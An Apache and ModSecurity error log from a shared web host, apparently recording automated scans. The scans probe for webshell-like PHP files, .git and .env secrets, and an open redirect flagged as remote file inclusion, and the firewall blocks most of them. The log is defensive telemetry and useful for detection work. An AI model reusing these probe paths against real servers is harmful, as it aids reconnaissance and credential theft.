[Mon May 11 15:14:46.475806 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/info.php
[Mon May 11 15:14:46.645730 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/users.php
[Mon May 11 15:14:46.815680 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/install.php
[Mon May 11 15:14:46.985398 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/item.php
[Mon May 11 15:14:47.155689 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/jga.php
[Mon May 11 15:14:47.326714 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/leaf.php
[Mon May 11 15:14:47.496626 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/ms-files.php
[Mon May 11 15:14:47.666761 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/lock.php
[Mon May 11 15:14:47.836689 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/wp-blog-header.php
[Mon May 11 15:14:48.006857 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/lock360.php
[Mon May 11 15:14:48.177014 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/log.php
[Mon May 11 15:14:48.347242 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/manager.php
[Mon May 11 15:14:48.517640 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/meta.php
[Mon May 11 15:14:48.690878 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/mini.php
[Mon May 11 15:14:48.882205 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/mjq.php
[Mon May 11 15:14:49.052354 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/new.php
[Mon May 11 15:14:49.225106 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/onclickfuns.php
[Mon May 11 15:14:49.395441 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/option.php
[Mon May 11 15:14:49.565465 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/plugin-editor.php
[Mon May 11 15:14:49.754739 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/profile.php
[Mon May 11 15:14:49.925085 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/qw_03b4ad31.php
[Mon May 11 15:14:50.095839 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/radio.php
[Mon May 11 15:14:50.266793 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/sf.php
[Mon May 11 15:14:50.437105 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/simple.php
[Mon May 11 15:14:50.608781 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/sql.php
[Mon May 11 15:14:50.779036 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/test.php
[Mon May 11 15:14:50.949151 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/test1.php
[Mon May 11 15:14:51.119309 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/themes.php
[Mon May 11 15:14:51.484888 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/wp-admin.php
[Mon May 11 15:14:51.836641 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/wp-blog-header.php
[Mon May 11 15:14:52.006857 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/wp-config-sample.php
[Mon May 11 15:14:52.882078 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/wp.php
[Mon May 11 15:14:53.222763 2026] [:error] [pid 1320398:tid 1320418] [client 4.193.137.131:21648] File does not exist: /home/apoefr/public_html/xmlrpc.php
[Mon May 11 15:15:04.935271 2026] [security2:error] [pid 1319886:tid 1319908] [client 196.51.9.47:49128] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://47.105.105.181 found within ARGS:url: https://47.105.105.181/stacicarboni9/6824plastic-surgery/wiki/Planning+Plastic+Surgery+With+a+Toronto+Plastic+Surgeon/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHWWKy-5-wpj6Sx56aWoQAAAAY"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2F%2F47.105.105.181%2Fstacicarboni9%2F6824plastic-surgery%2Fwiki%2FPlanning%2BPlastic%2BSurgery%2BWith%2Ba%2BToronto%2BPlastic%2BSurgeon/
[Mon May 11 15:15:04.936207 2026] [security2:error] [pid 1319886:tid 1319908] [client 196.51.9.47:49128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHWWKy-5-wpj6Sx56aWoQAAAAY"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2F%2F47.105.105.181%2Fstacicarboni9%2F6824plastic-surgery%2Fwiki%2FPlanning%2BPlastic%2BSurgery%2BWith%2Ba%2BToronto%2BPlastic%2BSurgeon/
[Mon May 11 15:15:04.936680 2026] [security2:error] [pid 1319886:tid 1319908] [client 196.51.9.47:49128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHWWKy-5-wpj6Sx56aWoQAAAAY"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2F%2F47.105.105.181%2Fstacicarboni9%2F6824plastic-surgery%2Fwiki%2FPlanning%2BPlastic%2BSurgery%2BWith%2Ba%2BToronto%2BPlastic%2BSurgeon/
[Mon May 11 15:15:06.218097 2026] [security2:error] [pid 1319998:tid 1320001] [client 196.51.12.223:59018] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://47.105.105.181 found within ARGS:url: https://47.105.105.181/stacicarboni9/6824plastic-surgery/wiki/Planning+Plastic+Surgery+With+a+Toronto+Plastic+Surgeon/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHWWqt2WtvoFr7xvGzSLgAAAIE"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2F%2F47.105.105.181%2Fstacicarboni9%2F6824plastic-surgery%2Fwiki%2FPlanning%2BPlastic%2BSurgery%2BWith%2Ba%2BToronto%2BPlastic%2BSurgeon/
[Mon May 11 15:15:06.219401 2026] [security2:error] [pid 1319998:tid 1320001] [client 196.51.12.223:59018] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHWWqt2WtvoFr7xvGzSLgAAAIE"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2F%2F47.105.105.181%2Fstacicarboni9%2F6824plastic-surgery%2Fwiki%2FPlanning%2BPlastic%2BSurgery%2BWith%2Ba%2BToronto%2BPlastic%2BSurgeon/
[Mon May 11 15:15:06.220008 2026] [security2:error] [pid 1319998:tid 1320001] [client 196.51.12.223:59018] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHWWqt2WtvoFr7xvGzSLgAAAIE"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2F%2F47.105.105.181%2Fstacicarboni9%2F6824plastic-surgery%2Fwiki%2FPlanning%2BPlastic%2BSurgery%2BWith%2Ba%2BToronto%2BPlastic%2BSurgeon/
[Mon May 11 15:15:07.473774 2026] [security2:error] [pid 1320398:tid 1320404] [client 196.51.9.71:60738] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://47.105.105.181 found within ARGS:url: https://47.105.105.181/stacicarboni9/6824plastic-surgery/wiki/Planning+Plastic+Surgery+With+a+Toronto+Plastic+Surgeon/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHWW-JEyNRN152ArOSJuQAAAEQ"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2F%2F47.105.105.181%2Fstacicarboni9%2F6824plastic-surgery%2Fwiki%2FPlanning%2BPlastic%2BSurgery%2BWith%2Ba%2BToronto%2BPlastic%2BSurgeon/
[Mon May 11 15:15:07.475190 2026] [security2:error] [pid 1320398:tid 1320404] [client 196.51.9.71:60738] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHWW-JEyNRN152ArOSJuQAAAEQ"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2F%2F47.105.105.181%2Fstacicarboni9%2F6824plastic-surgery%2Fwiki%2FPlanning%2BPlastic%2BSurgery%2BWith%2Ba%2BToronto%2BPlastic%2BSurgeon/
[Mon May 11 15:15:07.475879 2026] [security2:error] [pid 1320398:tid 1320404] [client 196.51.9.71:60738] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHWW-JEyNRN152ArOSJuQAAAEQ"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2F%2F47.105.105.181%2Fstacicarboni9%2F6824plastic-surgery%2Fwiki%2FPlanning%2BPlastic%2BSurgery%2BWith%2Ba%2BToronto%2BPlastic%2BSurgeon/
[Mon May 11 15:15:22.836749 2026] [ssl:error] [pid 1319885:tid 1319930] (EAI 2)Name or service not known: [client 47.128.59.91:63834] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:15:22.836830 2026] [ssl:error] [pid 1319885:tid 1319930] AH01941: stapling_renew_response: responder error
[Mon May 11 15:15:54.929603 2026] [security2:error] [pid 1319998:tid 1320014] [client 8.231.43.16:43878] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.git/config"] [unique_id "agHWiqt2WtvoFr7xvGzSUQAAAI4"]
[Mon May 11 15:15:54.929840 2026] [security2:error] [pid 1319998:tid 1320014] [client 8.231.43.16:43878] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.git/config"] [unique_id "agHWiqt2WtvoFr7xvGzSUQAAAI4"]
[Mon May 11 15:15:55.805518 2026] [security2:error] [pid 1319998:tid 1320014] [client 8.231.43.16:43878] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agHWiqt2WtvoFr7xvGzSUQAAAI4"]
[Mon May 11 15:16:29.733693 2026] [authz_core:error] [pid 1319953:tid 1319975] [client 47.128.28.171:32968] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/rest-api/error_log
[Mon May 11 15:17:00.289901 2026] [authz_core:error] [pid 1319953:tid 1319956] [client 216.73.216.110:25447] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/coursecopy/classes/error_log
[Mon May 11 15:17:14.593575 2026] [security2:error] [pid 1320674:tid 1320713] [client 43.156.249.28:57172] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "maelbailly.fr"] [uri "/"] [unique_id "agHW2qO9RdIr1DwxYR2RgAAAANg"]
[Mon May 11 15:17:19.402633 2026] [security2:error] [pid 1319998:tid 1320015] [client 43.156.249.28:37320] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agHW36t2WtvoFr7xvGzSowAAAI8"], referer: http://maelbailly.fr
[Mon May 11 15:17:31.666277 2026] [security2:error] [pid 1320398:tid 1320413] [client 49.51.253.26:37230] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpc-entreprises.com"] [uri "/"] [unique_id "agHW6-JEyNRN152ArOSKKgAAAE0"]
[Mon May 11 15:17:35.005043 2026] [security2:error] [pid 1320674:tid 1320704] [client 49.51.253.26:53868] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpc-entreprises.com"] [uri "/"] [unique_id "agHW76O9RdIr1DwxYR2RjwAAAM8"], referer: http://cpc-entreprises.com
[Mon May 11 15:18:13.864460 2026] [autoindex:error] [pid 1320398:tid 1320417] [client 5.255.122.176:13292] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 15:18:13.867863 2026] [core:error] [pid 1320398:tid 1320417] [client 5.255.122.176:13292] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:18:14.083575 2026] [autoindex:error] [pid 1319885:tid 1319932] [client 5.255.122.176:43842] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 15:18:14.094404 2026] [core:error] [pid 1319885:tid 1319932] [client 5.255.122.176:43842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:18:15.271033 2026] [core:error] [pid 1320398:tid 1320411] [client 5.255.122.176:43930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:18:15.271061 2026] [core:error] [pid 1320398:tid 1320411] [client 5.255.122.176:43930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:18:15.289684 2026] [core:error] [pid 1319885:tid 1319907] [client 5.255.122.176:43948] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:18:15.289859 2026] [core:error] [pid 1319885:tid 1319907] [client 5.255.122.176:43948] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:18:15.291054 2026] [core:error] [pid 1319886:tid 1319914] [client 5.255.122.176:43852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:18:15.291180 2026] [core:error] [pid 1319886:tid 1319914] [client 5.255.122.176:43852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:18:15.359631 2026] [security2:error] [pid 1319885:tid 1319892] [client 5.255.122.176:43906] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/api/.env"] [unique_id "agHXF1chVQ3tCn0m9OpXhQAAAQQ"]
[Mon May 11 15:18:15.360245 2026] [security2:error] [pid 1319885:tid 1319892] [client 5.255.122.176:43906] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/api/.env"] [unique_id "agHXF1chVQ3tCn0m9OpXhQAAAQQ"]
[Mon May 11 15:18:15.360826 2026] [core:error] [pid 1319885:tid 1319892] [client 5.255.122.176:43906] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 15:18:15.362605 2026] [security2:error] [pid 1319885:tid 1319892] [client 5.255.122.176:43906] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agHXF1chVQ3tCn0m9OpXhQAAAQQ"]
[Mon May 11 15:18:15.363699 2026] [security2:error] [pid 1320398:tid 1320415] [client 5.255.122.176:43888] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.production"] [unique_id "agHXF-JEyNRN152ArOSKkQAAAE8"]
[Mon May 11 15:18:15.363855 2026] [security2:error] [pid 1319953:tid 1319977] [client 5.255.122.176:43922] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/backend/.env"] [unique_id "agHXF-SQ-m-m0ukSShuAkQAAAVY"]
[Mon May 11 15:18:15.363877 2026] [security2:error] [pid 1320398:tid 1320415] [client 5.255.122.176:43888] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.production"] [unique_id "agHXF-JEyNRN152ArOSKkQAAAE8"]
